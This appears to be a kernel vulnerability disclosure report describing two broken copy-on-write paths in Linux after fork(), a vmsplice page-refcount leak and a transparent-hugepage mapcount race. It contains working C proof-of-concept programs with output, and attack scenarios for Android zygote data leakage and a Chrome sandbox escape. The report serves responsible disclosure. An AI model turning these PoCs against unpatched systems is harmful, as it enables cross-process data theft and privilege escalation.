I've stumbled over two ways in which copy-on-write of anonymous
memory after
fork() is currently broken: Page references through the page
refcount and a bug
in THP logic.
== Page refcount isn't being accounted for ==
This one's fairly straightforward:
```
$ cat vmsplice.c
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
#include <err.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <sys/wait.h>
#define SYSCHK(x) ({ \\
typeof(x) __res = (x); \\
if (__res == (typeof(x))-1) \\
err(1, \"SYSCHK(\" #x \")\"); \\
__res; \\
})
static void *data;
static void child_fn(void) {
int pipe_fds[2];
SYSCHK(pipe(pipe_fds));
struct iovec iov = {.iov_base = data, .iov_len = 0x1000 };
SYSCHK(vmsplice(pipe_fds[1], &iov, 1, 0));
SYSCHK(munmap(data, 0x1000));
sleep(2);
char buf[0x1000];
SYSCHK(read(pipe_fds[0], buf, 0x1000));
printf(\"read string from child: %s\
\", buf);
}
int main(void) {
if (posix_memalign(&data, 0x1000, 0x1000))
errx(1, \"posix_memalign()\");
strcpy(data, \"BORING DATA\");
pid_t child = SYSCHK(fork());
if (child == 0) {
child_fn();
return 0;
}
sleep(1);
strcpy(data, \"THIS IS SECRET\");
int status;
SYSCHK(wait(&status));
}
$ gcc -o vmsplice vmsplice.c && ./vmsplice
read string from child: THIS IS SECRET
$
```
As you can see, the fork() child can read memory from the parent
by grabbing a
refcounted reference to a page with vmsplice(), then dropping the
page from its
pagetables. This is because the CoW fault handler grants the parent
write access
to the original page if its mapcount indicates that nobody else has
it mapped.
This could potentially have security implications in
environments like Android,
where (almost) all apps are forked from a common zygote process. In
the
following scenario, this would lead to data leakage between
apps:
- zygote writes to page X (ensuring that any preexisting CoW is
broken)
- zygote forks off an attacker-controlled child process C1
- C1 grabs page X into a pipe with vmsplice()
- C1 drops its mapcount on page X
- zygote forks off a victim child process C2
- zygote writes to page X (resolving CoW fault by duplicating the
page)
- C2 writes secret data to page X (resolving CoW fault by granting
write access
to the original page)
- C1 reads secret data from the pipe
However, so far I haven't managed to actually leak data from
another app with
this one.
== THP mapcount check is racy ==
This one is somewhat more severe. Basically, there is a race
between
__split_huge_pmd_locked() and page_trans_huge_map_swapcount() that
can cause the
THP CoW fault path to ignore up to two other mappings if one other
process is
concurrently shattering its THP mapping. I think this may have been
introduced in commit 6d0a07edd17c (\"mm: thp: calculate the
mapcount correctly for THP pages during WP faults\").
page_trans_huge_map_swapcount() first looks at 4K mapcounts,
then looks at the
DoubleMap flag and the compound_mapcount(page).
__split_huge_pmd_locked() can concurrently move references from
the
compound mapcount over to the 4K mapcounts.
There are no common locks between the two.
Therefore, essentially, page_trans_huge_map_swapcount() can observe
the old
state of the 4K mapcounts (which don't yet account for the other
mapping)
combined with the new state of the hugepage mapcount (which doesn't
account for
the other mapping anymore).
It is possible for not just one, but two mappings to be ignored
because of the
DoubleMap flag: If page_trans_huge_map_swapcount() observes the old
state
of the 4K mapcounts, but the new state of the DoubleMap flag, it
will
incorrectly subtract 1 from the result in addition to not observing
the mapcount
of the __split_huge_pmd_locked() caller.
Here is a PoC that demonstrates the issue with two mappings
(testing in a KVM
guest):
-----------------------------------------------------------
user@vm:~/tmp/transhuge$ cat thp_munmap.c
#include <sys/mman.h>
#include <err.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/eventfd.h>
int main(void) {
volatile char *mapping = mmap((void*)0x200000, 0x200000,
PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if (mapping == MAP_FAILED)
err(1, \"mmap\");
*mapping = 1;
system(\"cat /proc/$PPID/smaps | head -n40; echo
=======================\");
int efd = eventfd(0, 0);
unsigned long long iteration = 0;
while (1) {
iteration++;
*mapping = 1;
pid_t child = fork();
if (child == -1) err(1, \"fork\");
if (child == 0) {
if (munmap((void*)(mapping+0x1000), 0x1f0000)) err(1,
\"munmap\");
// wait for parent to tell us to measure and exit
uint64_t dummy;
if (eventfd_read(efd, &dummy)) err(1, \"eventfd_read\");
if (*mapping != 1)
errx(1, \"broken cow: expected 1, got %hhd, in iteration %llu\",
*mapping, iteration);
//system(\"cat /proc/$PPID/smaps | head -n40; echo
=======================\");
exit(0);
}
*mapping = 2;
// tell child to continue
if (eventfd_write(efd, 1)) err(1, \"eventfd_write\");
int status;
if (waitpid(child, &status, 0) != child) err(1,
\"waitpid\");
}
}
user@vm:~/tmp/transhuge$ gcc -o thp_munmap thp_munmap.c
user@vm:~/tmp/transhuge$ ./thp_munmap
00200000-00400000 rw-p 00000000 00:00 0
Size: 2048 kB
KernelPageSize: 4 kB
MMUPageSize: 4 kB
Rss: 2048 kB
Pss: 2048 kB
Shared_Clean: 0 kB
Shared_Dirty: 0 kB
Private_Clean: 0 kB
Private_Dirty: 2048 kB
Referenced: 2048 kB
Anonymous: 2048 kB
LazyFree: 0 kB
AnonHugePages: 2048 kB
[...]
=======================
thp_munmap: broken cow: expected 1, got 2, in iteration 48580
thp_munmap: broken cow: expected 1, got 2, in iteration 239811
^C
user@vm:~/tmp/transhuge$
-----------------------------------------------------------
By relying on khugepaged, it is even possible to trigger this
issue without
explicit mm syscalls, just malloc(), fork() and free(), as long as
the kernel is
configured to automatically collapse hugepages with khugepaged
(which seems to
be the case e.g. on Debian):
-----------------------------------------------------------
$ cat thp_malloc_large_nosleep.c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <stdint.h>
#include <err.h>
#include <sys/eventfd.h>
#include <sys/poll.h>
#include <sys/wait.h>
int main(void) {
int efd = eventfd(0, 0);
char *a = malloc(0x1fe000);
char *b = malloc(0x1fe000);
printf(\"a = %p, b = %p\
\", a, b);
printf(\"waiting for keypress...\
\");
// we want khugepaged to create a hugepage that
// covers parts of `a` and `b` here
while (1) {
struct pollfd pollfd = {.fd = 0, .events = POLLIN};
if (poll(&pollfd, 1, 1000) == 1)
break;
memset(a, 'A', 0x1fe000);
memset(b, 'B', 0x1fe000);
}
unsigned long long iteration = 0;
while (1) {
iteration++;
a[0] = 1;
pid_t child = fork();
if (child == -1) err(1, \"fork\");
if (child == 0) {
// shatter hugepage
free(b);
// wait for parent to tell us to measure and exit
uint64_t dummy;
if (eventfd_read(efd, &dummy)) err(1, \"eventfd_read\");
if (a[0] != 1)
printf(\"broken cow: expected 1, got %hhd, in iteration %llu\
\",
a[0], iteration);
exit(0);
}
// normally this should copy the hugepage (or fall back to
// creating a 4K-page copy), but if we win the race it'll
// write directly to the original page
a[0] = 2;
// tell child to continue
if (eventfd_write(efd, 1)) err(1, \"eventfd_write\");
int status;
if (waitpid(child, &status, 0) != child) err(1,
\"waitpid\");
}
}
$ gcc -O2 -o thp_malloc_large_nosleep
thp_malloc_large_nosleep.c
$ ./thp_malloc_large_nosleep
a = 0x7f49c2e28010, b = 0x7f49c2c29010
waiting for keypress...
[wait until khugepaged has collapsed the page according to
smaps,
then press enter and wait]
broken cow: expected 1, got 2, in iteration 333209
broken cow: expected 1, got 2, in iteration 703886
broken cow: expected 1, got 2, in iteration 850974
broken cow: expected 1, got 2, in iteration 1014706
broken cow: expected 1, got 2, in iteration 1137223
broken cow: expected 1, got 2, in iteration 1143961
broken cow: expected 1, got 2, in iteration 1176183
broken cow: expected 1, got 2, in iteration 1970669
^C
$
-----------------------------------------------------------
The three-process version of this is probably more interesting
for local
privilege escalation attacks (since you can gain write access to
the memory of a
process that is not participating in the race at all); however, it
also has a
much narrower race window: One process needs to go through the
critical section
of __split_huge_pmd_locked() while another one is stuck in this
part of
page_trans_huge_map_swapcount():
for (i = 0; i < HPAGE_PMD_NR; i++) {
// race region begins with this atomic_read() in the
// last iteration
mapcount = atomic_read(&page[i]._mapcount) + 1;
_total_mapcount += mapcount;
if (map) {
swapcount = swap_count(map[offset + i]);
_total_swapcount += swapcount;
}
map_swapcount = max(map_swapcount, mapcount + swapcount);
}
unlock_cluster(ci);
// race region ends with the PG_double_map test in here
if (PageDoubleMap(page)) {
map_swapcount -= 1;
_total_mapcount -= HPAGE_PMD_NR;
}
mapcount = compound_mapcount(page);
An attacker can't preempt the task here because it's holding a
spinlock; but
IRQs are on, so e.g. TLB flush IPIs from another thread can
interrupt execution
for quite some time. (But I haven't really figured out yet how
accurately you
could hit this race; according to some early experiments I've done,
it looks
like if you know the exact configuration of the system, you may be
able to cause
the TLB flush to happen in the race window with a probability
around 0.3% or so,
and then you'd need to additionally have __split_huge_pmd_locked()
happen at the
right time.)
If an attacker could write a sufficiently fast attack for this
issue, they might
be able to use it to break out of e.g. the Chrome renderer sandbox
on normal
Linux desktop systems - Chrome on Linux creates untrusted renderers
as child
processes of a \"zygote\" process, which doesn't seem to be fully
sandboxed, so an
attacker controlling two of its children could potentially use this
bug to cause
memory corruption in the zygote.
This bug is subject to a 90 day disclosure deadline. After 90
days elapse,
the bug report will become visible to the public. The scheduled
disclosure
date is 2020-08-25. Disclosure at an earlier date is possible
if
the bug has been fixed in Linux stable releases (per agreement
with
Found by:

